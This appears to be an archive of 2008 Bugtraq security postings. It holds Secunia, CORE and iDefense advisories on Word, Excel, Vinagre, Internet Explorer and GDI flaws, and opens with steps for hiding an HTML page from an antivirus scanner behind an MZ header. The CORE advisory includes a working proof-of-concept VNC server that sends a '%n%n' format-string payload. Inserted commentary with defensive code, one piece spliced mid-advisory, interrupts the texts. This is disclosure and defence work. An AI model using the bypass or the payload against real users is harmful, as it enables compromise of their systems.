1- Add the MZ header to the HTML file:
MZ ... This program cannot be run in DOS mode.
(the non-printable bytes of the DOS stub between "MZ" and the message were lost in the archive)
   You can put other EXE info in the HTML body for more deception.
2- Rename the HTML to a file with no extension, or txt or jpg.
3- Upload it to a web server:
    http://localhost/mallpage.txt or http://localhost/mallpage<no extension>.
Video POC:
A simple video explaining how the vulnerability can be exploited under ESET Smart Security (Arabic).
------------------------------
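The bypass described in the post works because the scanner keys on the leading "MZ" bytes while the browser sniffs the content and renders the HTML regardless of the prefix. The Python below is an added example, not the poster's code and not any vendor's detection logic: it shows a magic-byte-first classifier being fooled by a constructed MZ-prefixed HTML page, and two checks that are not fooled, namely content sniffing over a window (as a browser does it) and following e_lfanew to require a real PE signature before accepting the file as an executable. The sample files are constructed inline and contain no exploit.

```python
"""Why a leading MZ stub is not an executable, and why a scanner that trusts
the first bytes misses HTML a browser will still render (added example)."""
import re
import struct

DOS_STUB_TEXT = b"This program cannot be run in DOS mode."
HTML_MARKERS = (b"<!doctype html", b"<html", b"<head", b"<body", b"<script",
                b"<object", b"<iframe")


def naive_type(data):
    """Magic-byte-first classifier: whatever the leading bytes say wins."""
    if data[:2] == b"MZ":
        return "pe"
    if re.search(rb"<html|<!doctype html|<script", data[:512], re.I):
        return "html"
    return "unknown"


def has_pe_header(data):
    """Follow e_lfanew (offset 0x3C) and require the 'PE\\0\\0' signature there."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)
    return data[e_lfanew:e_lfanew + 4] == b"PE\0\0"


def sniff_html(data, window=4096):
    """Content sniffing as a browser does it: markup anywhere in the first
    `window` bytes makes the document HTML, whatever prefix it carries."""
    head = data[:window].lower()
    return any(marker in head for marker in HTML_MARKERS)


def classify(data):
    """Verdict that does not stop at the magic: HTML beats an MZ prefix, and
    an MZ prefix without a PE header is a stub, not a program."""
    if sniff_html(data):
        return "html"
    if has_pe_header(data):
        return "pe"
    if data[:2] == b"MZ":
        return "mz-prefix-only"
    return "unknown"


def _mz_header(e_lfanew):
    """64-byte DOS header with only the fields the checks above look at."""
    hdr = bytearray(0x40)
    hdr[:2] = b"MZ"
    struct.pack_into("<I", hdr, 0x3C, e_lfanew)
    return bytes(hdr)


# Constructed samples (not real files): a minimal PE skeleton, and an HTML
# page wearing an MZ header and DOS stub the way the post describes.
MINI_PE = _mz_header(0x40) + b"PE\0\0" + bytes(20)
MZ_HTML = (_mz_header(0x80) + DOS_STUB_TEXT + b"\r\n"
           + b"<html><body><p>constructed sample page</p></body></html>")

if __name__ == "__main__":
    for name, sample in (("MINI_PE", MINI_PE), ("MZ_HTML", MZ_HTML)):
        print(f"{name}: naive={naive_type(sample)} classify={classify(sample)}")
```

The order in `classify` is the point: the MZ test runs last, because anything a browser will treat as HTML must be judged as HTML first, and even then "MZ" only earns the "pe" verdict when the PE signature is actually where the header says it is.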

From - Tue Dec  9 14:29:50 2008
Date: Tue, 9 Dec 2008 19:38:46 +0100
From: Secunia Research <remove-vuln@secunia.com>
To: bugtraq@securityfocus.com
Subject: Secunia Research: Microsoft Word RTF Polyline/Polygon Integer Overflow
Message-Id: <200812091838.mB9IckQm029383@ca.secunia.com>

=====================================================================
                     Secunia Research 09/12/2008

        - Microsoft Word RTF Polyline/Polygon Integer Overflow -

=====================================================================
Table of Contents

Affected Software....................................................1
Severity.............................................................2
Vendor's Description of Software.....................................3
Description of Vulnerability.........................................4
Solution.............................................................5
Time Table...........................................................6
Credits..............................................................7
References...........................................................8
About Secunia........................................................9
Verification........................................................10

=====================================================================
1) Affected Software

* Microsoft Office Word 2003 SP3
* Microsoft Office Word Viewer 2003 SP3

NOTE: Other versions may also be affected.

=====================================================================
2) Severity

Rating: Highly critical
Impact: System compromise
Where:  Remote

=====================================================================
3) Vendor's Description of Software

"Office Word ... provides editing and reviewing tools that help you
create professional documents more easily than ever before."

Product Link:
http://office.microsoft.com/en-us/word/default.aspx

=====================================================================
4) Description of Vulnerability

Secunia Research has discovered a vulnerability in Microsoft Office 
Word, which can be exploited by malicious people to compromise a 
user's system.

The vulnerability is caused due to an integer overflow error when 
calculating the space required for the specified number of points in 
a polyline or polygon. This can be exploited to cause a heap-based 
buffer overflow during parsing of objects in Rich Text Format (.rtf) 
files e.g. when a user opens a specially crafted .rtf file with Word 
or previews a specially crafted e-mail.

Successful exploitation may allow execution of arbitrary code.

=====================================================================
5) Solution

Apply patches from MS08-072.

=====================================================================
6) Time Table

16/05/2008 - Vendor notified.
16/05/2008 - Vendor response.
03/07/2008 - Vendor provides status update.
15/08/2008 - Status update requested from vendor.
15/08/2008 - Vendor provides status update.
30/09/2008 - Vendor provides status update.
09/12/2008 - Vendor acknowledges that fix will be issued today.
09/12/2008 - Vendor publishes security bulletin.
09/12/2008 - Public disclosure.

=====================================================================
7) Credits

Discovered by Dyon Balding, Secunia Research.

=====================================================================
8) References

The Common Vulnerabilities and Exposures (CVE) project has assigned 
CVE-2008-4025 for the vulnerability.

MS08-072 (KB957173):
http://www.microsoft.com/technet/security/Bulletin/MS08-072.mspx

=====================================================================
9) About Secunia

Secunia offers vulnerability management solutions to corporate
customers with verified and reliable vulnerability intelligence
relevant to their specific system configuration:

http://secunia.com/advisories/business_solutions/

Secunia also provides a publicly accessible and comprehensive advisory
database as a service to the security community and private 
individuals, who are interested in or concerned about IT-security.

http://secunia.com/advisories/

Secunia believes that it is important to support the community and to
do active vulnerability research in order to aid improving the 
security and reliability of software in general:

http://secunia.com/secunia_research/

Secunia regularly hires new skilled team members. Check the URL below
to see currently vacant positions:

http://secunia.com/corporate/jobs/

Secunia offers a FREE mailing list called Secunia Security Advisories:

http://secunia.com/advisories/mailing_lists/

=====================================================================
10) Verification

Please verify this advisory by visiting the Secunia website:
http://secunia.com/secunia_research/2008-21/

Complete list of vulnerability reports published by Secunia Research:
http://secunia.com/secunia_research/

=====================================================================
From - Tue Dec  9 14:29:50 2008
Date: Tue, 9 Dec 2008 20:06:04 +0100
From: Secunia Research <remove-vuln@secunia.com>
To: bugtraq@securityfocus.com
Subject: Secunia Research: Microsoft Excel NAME Record Array Indexing Vulnerability
Message-Id: <200812091906.mB9J64cl000492@ca.secunia.com>

=====================================================================
                     Secunia Research 09/12/2008

     - Microsoft Excel NAME Record Array Indexing Vulnerability -

=====================================================================
Table of Contents

Affected Software....................................................1
Severity.............................................................2
Vendor's Description of Software.....................................3
Description of Vulnerability.........................................4
Solution.............................................................5
Time Table...........................................................6
Credits..............................................................7
References...........................................................8
About Secunia........................................................9
Verification........................................................10

=====================================================================
1) Affected Software

* Microsoft Office Excel 2000 SP3
* Microsoft Office Excel 2002 SP3

NOTE: Other versions may also be affected.

=====================================================================
2) Severity

Rating: Highly critical
Impact: System compromise
Where:  Remote

=====================================================================
3) Vendor's Description of Software

"Organize, analyze and present your data with precision and panache."

Product Link:
http://office.microsoft.com/en-us/excel/

=====================================================================
4) Description of Vulnerability

Secunia Research has discovered a vulnerability in Microsoft Excel,
which can be exploited by malicious people to compromise a user's 
system.

The vulnerability is caused due to insufficient validation of an index
value in the NAME record and can be exploited to corrupt memory via a
specially crafted Excel Spreadsheet (XLS) file.

Successful exploitation may allow execution of arbitrary code.
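Both Secunia advisories on this page describe the same class of parser defect: a size or an index is taken from the file and used without a range check, in the Word RTF case a point count multiplied into an allocation size that wraps in 32-bit arithmetic, in the Excel case a NAME-record index used as-is. The Python below is an added model, not Secunia's or Microsoft's code, and the record layouts (a 4-byte count followed by 8-byte points; a table of 4-byte NAME entries) are assumptions rather than the real RTF or BIFF formats. It shows the wrapped size producing a tiny buffer that the count-driven copy loop then overruns, the checked version rejecting the same record before allocating, and an unchecked index reading outside its table.

```python
"""Model of a wrapping size computation and an unchecked array index
(added example; record layouts are assumptions, not RTF or BIFF)."""
import struct

U32_MAX = 0xFFFFFFFF
POINT_SIZE = 8          # assumption: a point is two little-endian int32 values
NAME_ENTRY = 4          # assumption: fixed-size 4-byte NAME table entries


class RecordError(ValueError):
    """Raised by the checked parsers when the file lies about sizes or indexes."""


class HeapOverflow(RuntimeError):
    """Stands in for the memory corruption the unchecked parser would cause."""


def size_unchecked(count):
    """count * POINT_SIZE evaluated as a 32-bit C expression: wraps silently."""
    return (count * POINT_SIZE) & U32_MAX


def size_checked(count):
    """Reject any count whose product would not fit in 32 bits."""
    if count > U32_MAX // POINT_SIZE:
        raise RecordError(f"point count {count:#x} overflows the size computation")
    return count * POINT_SIZE


def parse_polyline(record, checked=True):
    """record := <count:u32 LE> <count x (x:i32 LE, y:i32 LE)>.

    The buffer is sized from the header count and the copy loop is driven by
    the same count, as in the vulnerable pattern; `checked` selects whether
    the size computation and the record length are validated first."""
    (count,) = struct.unpack_from("<I", record, 0)
    payload = record[4:]
    if checked:
        needed = size_checked(count)
        if len(payload) < needed:
            raise RecordError("record truncated: fewer points than the header claims")
    else:
        needed = size_unchecked(count)
    buf = bytearray(needed)                       # models the heap allocation
    for i in range(count):
        off = i * POINT_SIZE
        if off + POINT_SIZE > len(payload):
            break                                 # file exhausted
        if off + POINT_SIZE > len(buf):
            raise HeapOverflow(f"write at offset {off} into a {len(buf)}-byte buffer")
        buf[off:off + POINT_SIZE] = payload[off:off + POINT_SIZE]
    return [struct.unpack_from("<ii", buf, i * POINT_SIZE)
            for i in range(len(buf) // POINT_SIZE)]


def outcome(record, checked):
    """'ok', 'rejected' (checked parser refused it) or 'heap-overflow'."""
    try:
        parse_polyline(record, checked)
    except RecordError:
        return "rejected"
    except HeapOverflow:
        return "heap-overflow"
    return "ok"


def name_index_valid(table_len, index):
    return 0 <= index < table_len


def name_entry_unchecked(memory, table_off, index):
    """Index straight from the file: negative or oversized values read outside the table."""
    off = table_off + index * NAME_ENTRY
    return bytes(memory[off:off + NAME_ENTRY])


def name_entry_checked(memory, table_off, table_len, index):
    if not name_index_valid(table_len, index):
        raise RecordError(f"NAME index {index} outside 0..{table_len - 1}")
    return name_entry_unchecked(memory, table_off, index)


# Constructed inputs.
POINTS = struct.pack("<iiiiii", 1, 2, 3, 4, 5, 6)           # three points
GOOD_RECORD = struct.pack("<I", 3) + POINTS
EVIL_RECORD = struct.pack("<I", 0x20000001) + POINTS        # 0x20000001 * 8 wraps to 8
MEMORY = b"hdr!" + b"AAAABBBBCCCC" + b"SECR"                # [header][3-entry table][neighbour]
TABLE_OFF, TABLE_LEN = 4, 3

if __name__ == "__main__":
    for name, rec in (("good", GOOD_RECORD), ("evil", EVIL_RECORD)):
        print(name, "unchecked:", outcome(rec, False), "checked:", outcome(rec, True))
    print("NAME index 3 unchecked ->", name_entry_unchecked(MEMORY, TABLE_OFF, 3))
```

The checked parser validates in the order a reviewer would insist on: the multiplication is bounded before it is performed, the record length is compared against the result before anything is allocated, and only then is memory touched.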

=====================================================================
5) Solution

Apply patches from MS08-074.

=====================================================================
6) Time Table

02/09/2008 - Vendor notified.
03/09/2008 - Vendor response.
17/09/2008 - Vendor provides status update.
09/12/2008 - Vendor acknowledges that fix will be issued today.
09/12/2008 - Vendor publishes security bulletin.
09/12/2008 - Public disclosure.

=====================================================================
7) Credits

Discovered by Dyon Balding, Secunia Research.

=====================================================================
8) References

The Common Vulnerabilities and Exposures (CVE) project has assigned 
CVE-2008-4266 for the vulnerability.

MS08-074 (KB959070):
http://www.microsoft.com/technet/security/Bulletin/MS08-074.mspx

=====================================================================
9) About Secunia

See the identical "About Secunia" section in the preceding Secunia
advisory (Microsoft Word RTF Polyline/Polygon Integer Overflow).

=====================================================================
10) Verification

Please verify this advisory by visiting the Secunia website:
http://secunia.com/secunia_research/2008-36/

Complete list of vulnerability reports published by Secunia Research:
http://secunia.com/secunia_research/

=====================================================================
From - Tue Dec  9 15:59:51 2008
Date: Tue, 09 Dec 2008 17:49:36 -0200
From: CORE Security Technologies Advisories <advisories@coresecurity.com>
Organization: CORE Security Technologies
To: vulnwatch <vulnwatch@vulnwatch.org>, bugtraq <bugtraq@securityfocus.com>,
    full-disclosure@lists.grok.org.uk
Subject: CORE-2008-1127 - Vinagre show_error() format string vulnerability
Message-ID: <493ECBD0.1010907@coresecurity.com>

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

      Core Security Technologies - CoreLabs Advisory
           http://www.coresecurity.com/corelabs/

Vinagre show_error() format string vulnerability



1. *Advisory Information*

Title: Vinagre show_error() format string vulnerability
Advisory ID: CORE-2008-1127
Advisory URL: http://www.coresecurity.com/content/vinagre-format-string
Date published: 2008-12-09
Date of last update: 2008-12-09
Vendors contacted: Vinagre team
Release mode: Coordinated release


2. *Vulnerability Information*

Class: Format string
Remotely Exploitable: Yes
Locally Exploitable: No
Bugtraq ID: 32682
CVE Name: N/A


3. *Vulnerability Description*

Vinagre [1] is a VNC client for the GNOME Desktop. A format string error
has been found in the 'vinagre_utils_show_error()' function, which can be
exploited via commands issued from a malicious server containing format
string specifiers in the VNC name.

In a web-based attack scenario, the user would be required to connect to
a malicious server. Successful exploitation would then allow the
attacker to execute arbitrary code with the privileges of the Vinagre user.


4. *Vulnerable packages*

   . Vinagre 2.24.1 and previous versions


5. *Non-vulnerable packages*

   . Vinagre 2.24.2


6. *Vendor Information, Solutions and Workarounds*

The Vinagre team has released a fixed version, available at
http://ftp.acc.umu.se/pub/GNOME/sources/vinagre/2.24/vinagre-2.24.2.tar.gz


7. *Credits*

This vulnerability was discovered and researched by Alfredo Ortega from
Core Security Technologies.


8. *Technical Description / Proof of Concept Code*

The function 'vinagre_utils_show_error()' on 'src/vinagre-utils.c' follows:

/-----------

void
vinagre_utils_show_error (const gchar *message, GtkWindow *parent)
{
  GtkWidget *d;

  d = gtk_message_dialog_new (parent,
            GTK_DIALOG_MODAL | GTK_DIALOG_DESTROY_WITH_PARENT,
            GTK_MESSAGE_ERROR,
            GTK_BUTTONS_CLOSE,
            message);
....

-----------/

Here, the "message" string is used as the format string for the function
'gtk_message_dialog_new()', but it may be controlled by the user in many
ways. The simplest is invoking vinagre from the command line, e.g.:

/-----------

~$ vinagre %n%n

-----------/

But the vulnerability can also be triggered remotely via a malicious
VNC server.
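The following C program is an added illustration and is not code from the advisory or from Vinagre. It contrasts the vulnerable call shape of 'vinagre_utils_show_error()' (the untrusted message in the format position) with the standard repair (a constant "%s" format, the message as an ordinary argument), and adds a small helper that counts format directives in an untrusted string, which is the check an auditor wants for any string that reaches a printf-style API. The function names and the sample desktop name are constructed for this example.

```c
#include <stdarg.h>
#include <stdio.h>
#include <string.h>

/* Count printf-style conversion directives in an untrusted string.
 * "%%" is a literal percent sign and is not counted. A non-zero result
 * for a string about to be passed in the format position is the bug. */
size_t count_format_directives(const char *s)
{
    size_t n = 0;
    for (const char *p = s; *p != '\0'; p++) {
        if (*p != '%')
            continue;
        if (p[1] == '%') {      /* "%%" -> a literal '%' */
            p++;
            continue;
        }
        n++;                    /* "%n", "%s", "%08x", ... */
    }
    return n;
}

/* Vulnerable shape, mirroring vinagre_utils_show_error(): the message is
 * used as the format string, so directives in it are interpreted.
 * gcc -Wformat-security flags exactly this kind of call. Not called
 * below; it is here only to show the pattern to look for. */
int show_error_unsafe(char *out, size_t outlen, const char *message, ...)
{
    va_list ap;
    va_start(ap, message);
    int rc = vsnprintf(out, outlen, message, ap);
    va_end(ap);
    return rc;
}

/* Fixed shape: a constant format and the message as an ordinary argument,
 * i.e. gtk_message_dialog_new(..., "%s", message) in the real code. */
int show_error_safe(char *out, size_t outlen, const char *message)
{
    return snprintf(out, outlen, "Error: %s", message);
}

/* Renders into a static buffer so callers can inspect the exact text the
 * dialog would display for a given (untrusted) message. */
const char *render_error_safe(const char *message)
{
    static char buf[256];
    show_error_safe(buf, sizeof buf, message);
    return buf;
}

int main(void)
{
    /* constructed sample: the desktop name the PoC server sends */
    const char *desktop_name = "%n%n";
    printf("directives in \"%s\": %zu\n", desktop_name,
           count_format_directives(desktop_name));
    printf("%s\n", render_error_safe(desktop_name));
    return 0;
}
```

With the safe form the "%n%n" desktop name is displayed verbatim instead of being interpreted; the directive counter is also a cheap unit test to attach to any code path that builds a dialog or log line from a peer-supplied string.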


8.1. *Proof Of Concept*

The following python script implements a basic vnc server that triggers
the vulnerability:

/-----------

##
## Gnome Vinagre format string PoC VNC SERVER
##

import socket
import sys

# create an INET, STREAMing socket
serversocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

# bind the socket to a public host and a well-known port (VNC display :0)
serversocket.bind(("0.0.0.0", 5900))

# become a server socket
serversocket.listen(5)

while True:
    # accept connections from outside
    (clientsocket, address) = serversocket.accept()
    print("accept")

    # RFB version handshake
    clientsocket.send(b"RFB 003.008\n")
    resp = clientsocket.recv(100)
    print(resp)

    # security types: one type offered, type 1 (none)
    clientsocket.send(b"\x01\x01")
    resp = clientsocket.recv(100)
    if resp == b"\x01":
        print("security: none")
        clientsocket.send(b"\x00\x00\x00\x00")  # SecurityResult: OK
    else:
        sys.exit(-1)

    # ClientInit (shared-desktop flag)
    resp = clientsocket.recv(100)

    # ServerInit: framebuffer parameters, then the desktop name length (4)
    # and the name "%n%n" that reaches vinagre_utils_show_error()
    clientsocket.send(b"\x02\xd0\x01\x90\x20\x20\x00\x01\x00\xff\x00\xff\x00\xff\x10\x08\x00\x00\x00\x00\x00\x00\x00\x04%n%n")

    resp = clientsocket.recv(100)
    clientsocket.close()

-----------/




9. *Report Timeline*

. 2008-12-01: Core Security Technologies notifies the Vinagre team of
the vulnerability.
. 2008-12-02: Vinagre team asks Core for a technical description of the
vulnerability.
. 2008-12-02: Technical details sent to Vinagre team by Core.
. 2008-12-02: Vinagre team notifies Core this issue has been fixed in
the development branch, and that a new version will be available soon.
. 2008-12-05: Core asks Vinagre team if the new version is available.
. 2008-12-05: Vinagre team releases the Vinagre 2.24.2 version, which
fixes this issue.
. 2008-12-09: The advisory CORE-2008-1127 is published.


10. *References*

[1] http://projects.gnome.org/vinagre/.


11. *About CoreLabs*

CoreLabs, the research center of Core Security Technologies, is charged
with anticipating the future needs and requirements for information
security technologies. We conduct our research in several important
areas of computer security including system vulnerabilities, cyber
attack planning and simulation, source code auditing, and cryptography.
Our results include problem formalization, identification of
vulnerabilities, novel solutions and prototypes for new technologies.
CoreLabs regularly publishes security advisories, technical papers,
project information and shared software tools for public use at:
http://www.coresecurity.com/corelabs.


12. *About Core Security Technologies*

Core Security Technologies develops strategic solutions that help
security-conscious organizations worldwide develop and maintain a
proactive process for securing their networks. The company's flagship
product, CORE IMPACT, is the most comprehensive product for performing
enterprise security assurance testing. CORE IMPACT evaluates network,
endpoint and end-user vulnerabilities and identifies what resources are
exposed. It enables organizations to determine if current security
investments are detecting and preventing attacks. Core Security
Technologies augments its leading technology solution with world-class
security consulting services, including penetration testing and software
security auditing. Based in Boston, MA and Buenos Aires, Argentina, Core
Security Technologies can be reached at 617-399-6980 or on the Web at
http://www.coresecurity.com.


13. *Disclaimer*

The contents of this advisory are copyright (c) 2008 Core Security
Technologies and (c) 2008 CoreLabs, and may be distributed freely
provided that no fee is charged for this distribution and proper credit
is given.


14. *PGP/GPG Keys*

This advisory has been signed with the GPG key of Core Security
Technologies advisories team, which is available for download at
http://www.coresecurity.com/files/attachments/core_security_advisories.asc.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.7 (MingW32)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org

iD8DBQFJPsvQyNibggitWa0RAoZHAJ9RQxrboOG+3oWfK4qH8pMoZEELHgCeOyVJ
bVIpD2b1TEob7GKuEfmBAYs1Hp
-----END PGP SIGNATURE-----

From - Tue Dec  9 16:19:50 2008
X-Account-Key: account7
X-UIDL: 4909bb8c00004f80
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-38876-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing2.securityfocus.com (outgoing.securityfocus.com [205.206.231.26])
by mx.securityspace.com (Postfix) with ESMTP id 23E4EEC13C
for <lists@securityspace.com>; Tue,  9 Dec 2008 16:11:20 -0500 (EST)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing2.securityfocus.com (Postfix) with QMQP
id 787C21438B6; Tue,  9 Dec 2008 12:46:21 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 27586 invoked from network); 9 Dec 2008 19:59:44 -0000
Message-ID: <493ED229.3010705@idefense.com>
Date: Tue, 09 Dec 2008 15:16:41 -0500
From: iDefense Labs <labs-no-reply@idefense.com>
User-Agent: Thunderbird 2.0.0.18 (Windows/20081105)
MIME-Version: 1.0
To: bugtraq@securityfocus.com, vulnwatch@vulnwatch.org,
full-disclosure@lists.grok.org.uk
Subject: iDefense Security Advisory 12.09.08: Microsoft Internet Explorer
 5.01 EMBED tag Long File Name Extension Stack Buffer Overflow Vulnerability
 (iDefense Exclusive)
X-Enigmail-Version: 0.95.6
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Content-Transfer-Encoding: 8bit
Status:   

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

iDefense Security Advisory 12.09.08
http://labs.idefense.com/intelligence/vulnerabilities/
Dec 09, 2008

I. BACKGROUND

Internet Explorer is a graphical web browser developed by Microsoft
Corp. that has been included with Microsoft Windows since 1995. For
more information about Internet Explorer, please visit the following
website: http://www.microsoft.com/ie/

II. DESCRIPTION

Remote exploitation of a stack buffer overflow vulnerability while
handling specific HTML tags in Microsoft Corp.'s Internet Explorer web
browser allows attackers to execute arbitrary code within the context
of the affected user.

On Internet Explorer 5.01 a function return address can be overwritten
with attacker controlled data which results in an exploitable
condition. However on Internet Explorer 6 the vulnerability will only
overflow one byte. For Internet Explorer 6 on Windows 2000 platform,
the overflowed byte is in a local variable, and overwriting it doesn't
affect program execution at all. For Internet Explorer 6 on Windows XP
SP2, the overflowed byte is in the stack cookie, which causes Internet
Explorer to terminate and only results in a denial of service.

III. ANALYSIS

Successful exploitation of this vulnerability would allow an attacker to
execute arbitrary code in the context of the user running Internet
Explorer. However, the execution of arbitrary code is only possible on
Windows 2000 SP4 running Internet Explorer 5.01.

Exploitation would require an attacker to persuade a user to visit a
malicious website using Internet Explorer.

IV. DETECTION

As of September 2008, iDefense confirms that Internet Explorer 5.01 on
Windows 2000 SP4 is vulnerable. The issue also causes a denial of service
for Internet Explorer 6 on Windows XP SP2. Internet Explorer 7 is not
affected.

V. WORKAROUND

iDefense is not aware of any effective workaround for this issue.
Customers are encouraged to upgrade Internet Explorer to version 6 or
above.

VI. VENDOR RESPONSE

Microsoft has released a patch which addresses this issue. For more
information, consult their advisory at the following URL.

http://www.microsoft.com/technet/security/bulletin/ms08-073.mspx

Microsoft recommends that customers apply the update immediately.

VII. CVE INFORMATION

The Common Vulnerabilities and Exposures (CVE) project has assigned the
name CVE-2008-4261 to this issue. This is a candidate for inclusion in
the CVE list (http://cve.mitre.org/), which standardizes names for
security problems.

VIII. DISCLOSURE TIMELINE

08/26/2008  Initial Vendor Notification
08/26/2008  Initial Vendor Reply
09/24/2008  Additional Vendor Feedback
12/02/2008  Additional Vendor Feedback
12/09/2008  Coordinated Public Disclosure

IX. CREDIT

This vulnerability was discovered by Jun Mao of iDefense Labs.

Get paid for vulnerability research
http://labs.idefense.com/methodology/vulnerability/vcp.php

Free tools, research and upcoming events
http://labs.idefense.com/

X. LEGAL NOTICES

Copyright © 2008 iDefense, Inc.

Permission is granted for the redistribution of this alert
electronically. It may not be edited in any way without the express
written consent of iDefense. If you wish to reprint the whole or any
part of this alert in any other medium other than electronically,
please e-mail customerservice@idefense.com for permission.

Disclaimer: The information in the advisory is believed to be accurate
at the time of publishing based on currently available information. Use
of the information constitutes acceptance for use in an AS IS condition.
There are no warranties with regard to this information. Neither the
author nor the publisher accepts any liability for any direct,
indirect, or consequential loss or damage arising from use of, or
reliance on, this information.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.7 (MingW32)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org

iD8DBQFJPtIpbjs6HoxIfBkRApYJAJ9B8COXgvssiyBHgd6YEkv33SXFvwCfWCE4
fQbwagRXx5qH82/+HnnqCeA=Z/LM
-----END PGP SIGNATURE-----

From - Tue Dec  9 16:29:51 2008
X-Account-Key: account7
X-UIDL: 4909bb8c00004f81
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-38878-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing3.securityfocus.com (outgoing.securityfocus.com [205.206.231.27])
by mx.securityspace.com (Postfix) with ESMTP id BFE28EC13C
for <lists@securityspace.com>; Tue,  9 Dec 2008 16:21:42 -0500 (EST)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing3.securityfocus.com (Postfix) with QMQP
id 6ED2D236F41; Tue,  9 Dec 2008 14:08:12 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 28412 invoked from network); 9 Dec 2008 20:33:48 -0000
Message-ID: <493EDA1F.3040204@idefense.com>
Date: Tue, 09 Dec 2008 15:50:39 -0500
From: iDefense Labs <labs-no-reply@idefense.com>
User-Agent: Thunderbird 2.0.0.18 (Windows/20081105)
MIME-Version: 1.0
To: bugtraq@securityfocus.com, vulnwatch@vulnwatch.org,
full-disclosure@lists.grok.org.uk
Subject: iDefense Security Advisory 12.09.08: Microsoft Windows Graphics Device
 Interface Integer Overflow Vulnerability
X-Enigmail-Version: 0.95.6
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Content-Transfer-Encoding: 8bit
Status:   

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

iDefense Security Advisory 12.09.08
http://labs.idefense.com/intelligence/vulnerabilities/
Dec 09, 2008

I. BACKGROUND

Microsoft Windows graphics device interface (GDI) enables applications
to use graphics and formatted text on both the video display and the
printer. For more information about GDI, please visit the following Web
page: http://msdn2.microsoft.com/en-us/library/ms536795.aspx

II. DESCRIPTION

Remote exploitation of an integer overflow vulnerability in multiple
versions of Microsoft Corp.'s Windows operating system could allow an
attacker to execute arbitrary code with the privileges of the current
user.

This vulnerability exists in the way GDI handles integer math. An
integer overflow could occur while calculating a buffer length,
which results in an undersized heap buffer being allocated. This buffer
is then overflowed with data from the input image file.

III. ANALYSIS

Exploitation allows an attacker to execute arbitrary code with the
privileges of the current user. Exploitation would require convincing a
targeted user to view a specially crafted image file. An attacker could
host this file on a Web server, attach the file to an e-mail or
embed the file in an Office document.

This vulnerability also can be triggered through e-mail. If the e-mail
client can automatically display images embedded in the e-mail, the
user only needs to open the e-mail to trigger the vulnerability.
Currently an EMF file is used as a test attack vector. Outlook and
Outlook Express will automatically display EMF images and trigger the
vulnerability. Lotus Notes and Thunderbird do not display EMF images in
e-mail directly, but the vulnerability still can be triggered when
opening or viewing the EMF attachment.

IV. DETECTION

iDefense has confirmed that gdi32.dll file version 5.1.2600.3316, as
included in fully patched Windows XP Service Pack 2 as of May 2008, is
vulnerable. Other versions of Windows are suspected to be vulnerable.

V. WORKAROUND

Turning off metafile processing by modifying the registry mitigates this
threat. Under registry key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\GRE_Initialize create a DWORD entry "DisableMetaFiles"
and set it to 1.

Note 1: This does not affect processes that are already running, so you
might need to log off and log on again or restart the computer after
making the change.

Note 2: It only blocks one attack vector, the Windows metafile. It is
possible to exploit this vulnerability through other attack vectors.

Impact of Workaround: components relying on metafile processing might
not work properly, such as printing.

Viewing e-mail in plain text format mitigates e-mail-based attack.

VI. VENDOR RESPONSE

"The vulnerability could allow remote code execution if a user opens a
specially crafted WMF image file. An attacker who successfully
exploited this vulnerability could take complete control of an affected
system. An attacker could then install programs; view, change, or delete
data; or create new accounts."

Microsoft Corp. has released a patch which addresses this issue. For
more information, consult their advisory at the following URL.

http://www.microsoft.com/technet/security/Bulletin/ms08-071.mspx

VII. CVE INFORMATION

The Common Vulnerabilities and Exposures (CVE) project has assigned the
name CVE-2008-2249 to this issue. This is a candidate for inclusion in
the CVE list (http://cve.mitre.org/), which standardizes names for
security problems.

VIII. DISCLOSURE TIMELINE

05/21/2008  Initial Vendor Notification
05/21/2008  Initial Vendor Reply
09/05/2008  Additional Information Provided to Vendor
10/14/2008  Additional Vendor Feedback
12/09/2008  Coordinated Public Disclosure

IX. CREDIT

This vulnerability was discovered by Jun Mao of iDefense based on a
submission from an anonymous contributor.

Get paid for vulnerability research
http://labs.idefense.com/methodology/vulnerability/vcp.php

Free tools, research and upcoming events
http://labs.idefense.com/

X. LEGAL NOTICES

Copyright © 2008 iDefense, Inc.

Permission is granted for the redistribution of this alert
electronically. It may not be edited in any way without the express
written consent of iDefense. If you wish to reprint the whole or any
part of this alert in any other medium other than electronically,
please e-mail customerservice@idefense.com for permission.

